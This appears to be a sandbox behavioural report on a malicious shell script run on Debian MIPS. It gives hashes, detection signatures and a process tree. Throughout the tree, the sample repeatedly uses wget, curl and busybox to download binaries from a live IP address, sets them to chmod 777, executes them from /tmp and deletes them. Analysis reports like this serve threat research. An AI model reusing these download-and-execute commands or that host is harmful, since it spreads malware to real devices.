Analysis
-
max time kernel
68s -
max time network
70s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
28/10/2024, 02:01
Static task
static1
Behavioral task
behavioral1
Sample
005d953b62081fa02676b1afd5e50a67173a552a0ca6e02f3622a89497c75127.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
005d953b62081fa02676b1afd5e50a67173a552a0ca6e02f3622a89497c75127.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
005d953b62081fa02676b1afd5e50a67173a552a0ca6e02f3622a89497c75127.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
005d953b62081fa02676b1afd5e50a67173a552a0ca6e02f3622a89497c75127.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
005d953b62081fa02676b1afd5e50a67173a552a0ca6e02f3622a89497c75127.sh
-
Size
10KB
-
MD5
688ca450547096f076169e59bab218e1
-
SHA1
2187af4719b3b2f94b20e5e3ad20b8222bc077ac
-
SHA256
005d953b62081fa02676b1afd5e50a67173a552a0ca6e02f3622a89497c75127
-
SHA512
4b9aa7e6693587d69eb70d43f25242123a62a6acd4b0c3bedd1533f2afb49f99d44f26bb6c17dbcf9ca11f2d689e80cccb1df2447fa39a4541d82c23b2c13b0c
-
SSDEEP
192:2e6/8cxOOD6Ock1sDEQ9OuNUMEQ9Oure6/8cbOOD6O9:2e6/8cxOOD6Ock1sDEQ9OuNUMEQ9OurZ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 936 chmod 972 chmod 849 chmod 858 chmod 801 chmod 894 chmod 924 chmod 942 chmod 807 chmod 930 chmod 954 chmod 978 chmod 888 chmod 918 chmod 738 chmod 770 chmod 795 chmod 864 chmod 870 chmod 912 chmod 948 chmod 876 chmod 882 chmod 900 chmod 829 chmod 906 chmod 960 chmod 966 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH 739 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF 772 XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG 796 He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS 802 cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj 808 ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj /tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c 830 mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c /tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk 850 HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN 859 oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v 865 i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb 871 Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I 877 jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 883 tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc 889 Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa 895 Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 901 tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN 907 oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v 913 i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb 919 Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I 925 jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc 931 Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa 937 Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj 943 ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH 949 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF 955 XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG 961 He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS 967 cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS /tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c 973 mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c /tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk 979 HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb curl File opened for modification /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj curl File opened for modification /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I curl File opened for modification /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF curl File opened for modification /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 curl File opened for modification /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v curl File opened for modification /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG curl File opened for modification /tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk curl File opened for modification /tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk curl File opened for modification /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN curl File opened for modification /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v curl File opened for modification /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc curl File opened for modification /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa curl File opened for modification /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH curl File opened for modification /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS curl File opened for modification /tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c curl File opened for modification /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS curl File opened for modification /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH curl File opened for modification /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa curl File opened for modification /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb curl File opened for modification /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I curl File opened for modification /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF curl File opened for modification /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG curl File opened for modification /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj curl File opened for modification /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 curl File opened for modification /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN curl File opened for modification /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc curl File opened for modification /tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c curl
Processes
-
/tmp/005d953b62081fa02676b1afd5e50a67173a552a0ca6e02f3622a89497c75127.sh/tmp/005d953b62081fa02676b1afd5e50a67173a552a0ca6e02f3622a89497c75127.sh1⤵PID:707
-
/bin/rm/bin/rm bins.sh2⤵PID:711
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵PID:716
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:734
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵PID:737
-
-
/bin/chmodchmod 777 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- File and Directory Permissions Modification
PID:738
-
-
/tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH./07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- Executes dropped EXE
PID:739
-
-
/bin/rmrm 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵PID:740
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵PID:741
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:742
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵PID:751
-
-
/bin/chmodchmod 777 XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- File and Directory Permissions Modification
PID:770
-
-
/tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF./XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- Executes dropped EXE
PID:772
-
-
/bin/rmrm XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵PID:775
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵PID:777
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:787
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵PID:793
-
-
/bin/chmodchmod 777 He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- File and Directory Permissions Modification
PID:795
-
-
/tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG./He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- Executes dropped EXE
PID:796
-
-
/bin/rmrm He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵PID:797
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵PID:798
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:799
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵PID:800
-
-
/bin/chmodchmod 777 cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- File and Directory Permissions Modification
PID:801
-
-
/tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS./cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- Executes dropped EXE
PID:802
-
-
/bin/rmrm cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵PID:803
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵PID:804
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:805
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵PID:806
-
-
/bin/chmodchmod 777 ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- File and Directory Permissions Modification
PID:807
-
-
/tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj./ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- Executes dropped EXE
PID:808
-
-
/bin/rmrm ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵PID:809
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵PID:810
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:815
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵PID:823
-
-
/bin/chmodchmod 777 mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c./mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- Executes dropped EXE
PID:830
-
-
/bin/rmrm mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵PID:833
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵PID:834
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:841
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵PID:848
-
-
/bin/chmodchmod 777 HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵
- File and Directory Permissions Modification
PID:849
-
-
/tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk./HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵
- Executes dropped EXE
PID:850
-
-
/bin/rmrm HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵PID:851
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵PID:852
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:853
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵PID:854
-
-
/bin/chmodchmod 777 oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- File and Directory Permissions Modification
PID:858
-
-
/tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN./oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- Executes dropped EXE
PID:859
-
-
/bin/rmrm oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵PID:860
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵PID:861
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:862
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵PID:863
-
-
/bin/chmodchmod 777 i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- File and Directory Permissions Modification
PID:864
-
-
/tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v./i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- Executes dropped EXE
PID:865
-
-
/bin/rmrm i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵PID:866
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵PID:867
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:868
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵PID:869
-
-
/bin/chmodchmod 777 Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- File and Directory Permissions Modification
PID:870
-
-
/tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb./Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- Executes dropped EXE
PID:871
-
-
/bin/rmrm Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵PID:872
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵PID:873
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:874
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵PID:875
-
-
/bin/chmodchmod 777 jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- File and Directory Permissions Modification
PID:876
-
-
/tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I./jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- Executes dropped EXE
PID:877
-
-
/bin/rmrm jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵PID:878
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵PID:879
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- Reads runtime system information
- Writes file to tmp directory
PID:880
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵PID:881
-
-
/bin/chmodchmod 777 tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- File and Directory Permissions Modification
PID:882
-
-
/tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28./tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- Executes dropped EXE
PID:883
-
-
/bin/rmrm tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵PID:884
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵PID:885
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:886
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵PID:887
-
-
/bin/chmodchmod 777 Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- File and Directory Permissions Modification
PID:888
-
-
/tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc./Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- Executes dropped EXE
PID:889
-
-
/bin/rmrm Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵PID:890
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵PID:891
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:892
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵PID:893
-
-
/bin/chmodchmod 777 Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- File and Directory Permissions Modification
PID:894
-
-
/tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa./Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- Executes dropped EXE
PID:895
-
-
/bin/rmrm Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵PID:896
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵PID:897
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- Reads runtime system information
- Writes file to tmp directory
PID:898
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵PID:899
-
-
/bin/chmodchmod 777 tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- File and Directory Permissions Modification
PID:900
-
-
/tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28./tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- Executes dropped EXE
PID:901
-
-
/bin/rmrm tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵PID:902
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵PID:903
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:904
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵PID:905
-
-
/bin/chmodchmod 777 oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- File and Directory Permissions Modification
PID:906
-
-
/tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN./oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- Executes dropped EXE
PID:907
-
-
/bin/rmrm oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵PID:908
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵PID:909
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:910
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵PID:911
-
-
/bin/chmodchmod 777 i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- File and Directory Permissions Modification
PID:912
-
-
/tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v./i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- Executes dropped EXE
PID:913
-
-
/bin/rmrm i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵PID:914
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵PID:915
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:916
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵PID:917
-
-
/bin/chmodchmod 777 Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- File and Directory Permissions Modification
PID:918
-
-
/tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb./Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- Executes dropped EXE
PID:919
-
-
/bin/rmrm Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵PID:920
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵PID:921
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:922
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵PID:923
-
-
/bin/chmodchmod 777 jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- File and Directory Permissions Modification
PID:924
-
-
/tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I./jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- Executes dropped EXE
PID:925
-
-
/bin/rmrm jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵PID:926
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵PID:927
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:928
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵PID:929
-
-
/bin/chmodchmod 777 Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- File and Directory Permissions Modification
PID:930
-
-
/tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc./Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- Executes dropped EXE
PID:931
-
-
/bin/rmrm Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵PID:932
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵PID:933
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:934
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵PID:935
-
-
/bin/chmodchmod 777 Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- File and Directory Permissions Modification
PID:936
-
-
